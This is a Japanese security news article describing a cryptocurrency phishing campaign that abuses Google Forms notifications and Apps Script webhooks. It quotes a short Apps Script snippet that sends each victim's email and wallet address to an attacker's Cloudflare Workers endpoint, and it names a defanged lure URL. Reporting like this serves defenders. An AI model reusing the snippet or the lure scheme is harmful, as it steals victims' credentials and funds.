Google Form と Apps Script が攻撃ベクター:1クリックで詐欺サイトに接続

Hackers Leverage Google Forms Surveys to Trick Victims into Stealing Cryptocurrency

2025/07/25 CyberSecurityNews — スムーズなデータ収集手段として高い評価を得ている Google Form だが、2024年末に検出されてから 2025 Q2 にかけて急増した、暗号通貨フィッシング攻撃の意外な拠点となっている。この攻撃は、正規を装う forms.gle リンクを取り込んだ、迷惑メールの受信から始まるが、このリンクは、ほとんどのスパム・フィルターを容易に回避していく。それに続いて、メールの受信者が悪意のリンクを開くと、有名な仮想通貨取引所を装う Google フォームが表示され “1.275 BTC の支払いが保留中” というメッセージが表示される。

つまり、たった1回のクリックだけで、被害者は偽の出金ポータルへと誘導され、そこで “ウォレット・アドレスの確認” と、ごく少額の “ネットワーク手数料” の支払いを求められる。

入力された認証情報は、Cloudflare Workers の背後に隠された C2 (Command-and-Control) サーバへと数秒以内に送信され、支払われた仮想通貨はミキサー・ウォレットに転送されて送金経路が完全に消去される。

この攻撃の異質なところは、Google Form の通知エンジンを巧妙に悪用している点である。

すべての誘導メールが Google の SMTP インフラから送信されているため、ドメインの信頼性チェックでは、ほぼ常に問題なしと判定される。そのため、攻撃者からの悪意のメールは、ほぼ確実に受信者の受信トレイに届いてしまう。

Kaspersky によると、2025年7月初旬の定期的なテレメトリ分析の中で、Google Form を悪用するフィッシング・メッセージが 63% も増加しているという。同社は、「このキャンペーンは、2025年のソーシャル・エンジニアリングの、最も効果的なローテク攻撃のひとつとなる」と指摘している。

感染メカニズム:埋め込まれた WebHook による認証情報の収集

この悪意の Google Form は、Apps Script に紐づけられた WebHook を悪用し、被害者が “送信” ボタンをクリックした瞬間に、フォームへの入力の完了を待つことなく、外部へ向けて情報を秘密裏に送信する。

さらに、このスクリプトは、”hxxps://claim-btc-id[.]online” への1度限りの JavaScript リダイレクトも挿入する。この URL は、React 製の洗練されたフロントエンドと、Python Flask の API を備えた偽サイトのものであり、すべてのリクエストを、プロキシ経由で攻撃者の C2 サーバへ中継する。

以下は、漏えいしたフォーム・テンプレートから回収された、スニペットの抜粋であり、データの外部送信処理を示している:

function onFormSubmit(e){
  const payload = JSON.stringify({
      email: e.namedValues['Email'][0],
      wallet: e.namedValues['Wallet Address'][0]
  });
  UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
      method: 'post',
      contentType: 'application/json',
      payload: payload
  });
}
The transaction for the transfer has been verified (Source – Kaspersky)

上記の画像は、最初のフィッシング・メールの例であり、以下の画像は、偽の出金ポータルが表示する偽の支払いページのキャプチャである:

The scammers are counting on victims finding an offer of 1.275 BTC too hard to resist (Source – Kaspersky)
この攻撃への対策
  • Google Form からのメールは、ホワイトリストに登録されたもの以外は隔離するよう、コンテンツ除去ルールを設定する。
  • 見慣れない Cloudflare Workers ドメインへのリクエストをブロックするための、ブラウザ・エクステンションを導入する。
  • セキュリティ教育において、無料の仮想通貨がフォーム経由で届くことは絶対にないという、基本的な原則を繰り返し伝える。

Google Form の仕組みを狡猾に悪用する、サイバー攻撃が発見されました。正規の Google ドメインから送られるフィッシング・メールが、フィルターをすり抜けて、高い確率でメールボックスに到達します。しかも、Form に紐づけられた WebHook が、送信ボタンを押した瞬間に、情報を盗み取るよう設計されていると、この記事は指摘しています。よろしければ、Phishing で検索も、ご参照ください。